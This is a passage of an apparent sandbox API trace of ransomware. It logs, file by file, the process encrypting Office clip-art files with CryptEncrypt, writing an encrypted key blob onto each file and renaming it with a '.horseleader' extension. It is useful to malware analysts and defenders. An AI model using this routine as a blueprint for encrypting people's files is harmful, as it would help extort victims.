ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x504a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09662_.WMF", cAlternateFileName="")) returned 1 [0253.250] lstrcmpiW (lpString1="BD09662_.WMF", lpString2="Windows") returned -1 [0253.250] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 67 [0253.250] StrStrIW (lpFirst="BD09662_.WMF", lpSrch=".horseleader") returned 0x0 [0253.250] lstrcmpW (lpString1="BD09662_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.250] lstrcmpW (lpString1="BD09662_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.250] lstrlenW (lpString=".testttjffg") returned 11 [0253.250] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.251] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.251] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.251] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 67 [0253.253] StrStrW (lpFirst="BD09662_.WMF", lpSrch=".txt") returned 0x0 [0253.253] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 
lpFileSize=0x32aedd0*=20554) returned 1 [0253.253] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.256] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.257] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4a, lpOverlapped=0x0) returned 1 [0253.257] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4a, lpOverlapped=0x0) returned 1 [0253.257] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.257] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.258] CloseHandle (hObject=0x158) returned 1 [0253.258] 
GetProcessHeap () returned 0x780000 [0253.258] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.258] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.horseleader") returned 79 [0253.258] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09662_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09662_.wmf.horseleader")) returned 1 [0253.259] GetProcessHeap () returned 0x780000 [0253.259] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.259] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f1e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09664_.WMF", cAlternateFileName="")) returned 1 [0253.259] lstrcmpiW (lpString1="BD09664_.WMF", lpString2="Windows") returned -1 [0253.259] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 67 [0253.259] StrStrIW (lpFirst="BD09664_.WMF", lpSrch=".horseleader") returned 0x0 [0253.259] lstrcmpW (lpString1="BD09664_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.259] lstrcmpW (lpString1="BD09664_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.259] lstrlenW (lpString=".testttjffg") returned 11 
[0253.259] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.259] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.259] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.260] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 67 [0253.260] StrStrW (lpFirst="BD09664_.WMF", lpSrch=".txt") returned 0x0 [0253.260] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7966) returned 1 [0253.260] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f1e, lpOverlapped=0x0) returned 1 [0253.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe0e2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.262] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f1e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f1e, lpOverlapped=0x0) returned 1 [0253.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.263] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.263] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.263] CloseHandle (hObject=0x158) returned 1 [0253.263] GetProcessHeap () returned 0x780000 [0253.263] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.263] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.horseleader") returned 79 [0253.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09664_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09664_.wmf.horseleader")) returned 1 [0253.264] GetProcessHeap () returned 0x780000 [0253.264] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.264] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c365a00, ftCreationTime.dwHighDateTime=0x1bd4f6a, ftLastAccessTime.dwLowDateTime=0x5f47ba90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4c365a00, ftLastWriteTime.dwHighDateTime=0x1bd4f6a, nFileSizeHigh=0x0, nFileSizeLow=0x34cb, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD10890_.GIF", cAlternateFileName="")) returned 1 [0253.264] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="Windows") returned -1 [0253.264] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 67 [0253.264] StrStrIW (lpFirst="BD10890_.GIF", lpSrch=".horseleader") returned 0x0 [0253.264] lstrcmpW (lpString1="BD10890_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.264] lstrcmpW (lpString1="BD10890_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.264] lstrlenW (lpString=".testttjffg") returned 11 [0253.264] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.264] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.264] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.265] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 67 [0253.265] StrStrW (lpFirst="BD10890_.GIF", lpSrch=".txt") returned 0x0 [0253.265] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13515) returned 1 [0253.265] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x34cb, lpOverlapped=0x0) returned 1 [0253.268] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcb35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.268] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x34cb, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x34cb, lpOverlapped=0x0) returned 1 [0253.268] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.268] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.268] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.268] CloseHandle (hObject=0x158) returned 1 [0253.268] GetProcessHeap () returned 0x780000 [0253.268] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.268] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.horseleader") returned 79 [0253.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.horseleader")) returned 1 [0253.269] GetProcessHeap () returned 0x780000 [0253.269] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.269] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93701b00, ftCreationTime.dwHighDateTime=0x1bd4f69, 
ftLastAccessTime.dwLowDateTime=0x517da370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x93701b00, ftLastWriteTime.dwHighDateTime=0x1bd4f69, nFileSizeHigh=0x0, nFileSizeLow=0x4edd, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD10972_.GIF", cAlternateFileName="")) returned 1 [0253.269] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="Windows") returned -1 [0253.269] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 67 [0253.269] StrStrIW (lpFirst="BD10972_.GIF", lpSrch=".horseleader") returned 0x0 [0253.269] lstrcmpW (lpString1="BD10972_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.269] lstrcmpW (lpString1="BD10972_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.269] lstrlenW (lpString=".testttjffg") returned 11 [0253.269] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.270] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.270] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 67 [0253.271] StrStrW (lpFirst="BD10972_.GIF", lpSrch=".txt") returned 0x0 [0253.271] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 
lpFileSize=0x32aedd0*=20189) returned 1 [0253.271] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4edd, lpOverlapped=0x0) returned 1 [0253.273] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb123, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.273] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4edd, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4edd, lpOverlapped=0x0) returned 1 [0253.273] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.274] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.274] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.274] CloseHandle (hObject=0x158) returned 1 [0253.274] GetProcessHeap () returned 0x780000 [0253.274] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.274] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.horseleader") returned 79 [0253.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.horseleader" (normalized: 
"c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.horseleader")) returned 1 [0253.275] GetProcessHeap () returned 0x780000 [0253.275] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.275] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6557800, ftCreationTime.dwHighDateTime=0x1bd4d57, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6557800, ftLastWriteTime.dwHighDateTime=0x1bd4d57, nFileSizeHigh=0x0, nFileSizeLow=0x4fe6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19563_.GIF", cAlternateFileName="")) returned 1 [0253.275] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="Windows") returned -1 [0253.275] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 67 [0253.275] StrStrIW (lpFirst="BD19563_.GIF", lpSrch=".horseleader") returned 0x0 [0253.275] lstrcmpW (lpString1="BD19563_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.275] lstrcmpW (lpString1="BD19563_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.276] lstrlenW (lpString=".testttjffg") returned 11 [0253.276] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.276] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.276] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 67 [0253.277] StrStrW (lpFirst="BD19563_.GIF", lpSrch=".txt") returned 0x0 [0253.277] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20454) returned 1 [0253.277] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4fe6, lpOverlapped=0x0) returned 1 [0253.279] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb01a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.279] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4fe6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4fe6, lpOverlapped=0x0) returned 1 [0253.279] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.279] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.280] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.280] CloseHandle (hObject=0x158) returned 1 [0253.280] GetProcessHeap () returned 0x780000 [0253.280] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.280] wnsprintfW (in: pszDest=0x7dc820, 
cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.horseleader") returned 79 [0253.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.horseleader")) returned 1 [0253.281] GetProcessHeap () returned 0x780000 [0253.281] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.281] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f48c00, ftCreationTime.dwHighDateTime=0x1bd4d56, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe4f48c00, ftLastWriteTime.dwHighDateTime=0x1bd4d56, nFileSizeHigh=0x0, nFileSizeLow=0x3d75, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19582_.GIF", cAlternateFileName="")) returned 1 [0253.281] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="Windows") returned -1 [0253.281] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 67 [0253.281] StrStrIW (lpFirst="BD19582_.GIF", lpSrch=".horseleader") returned 0x0 [0253.281] lstrcmpW (lpString1="BD19582_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.281] lstrcmpW (lpString1="BD19582_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.281] lstrlenW (lpString=".testttjffg") returned 11 [0253.281] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.281] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.282] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 67 [0253.282] StrStrW 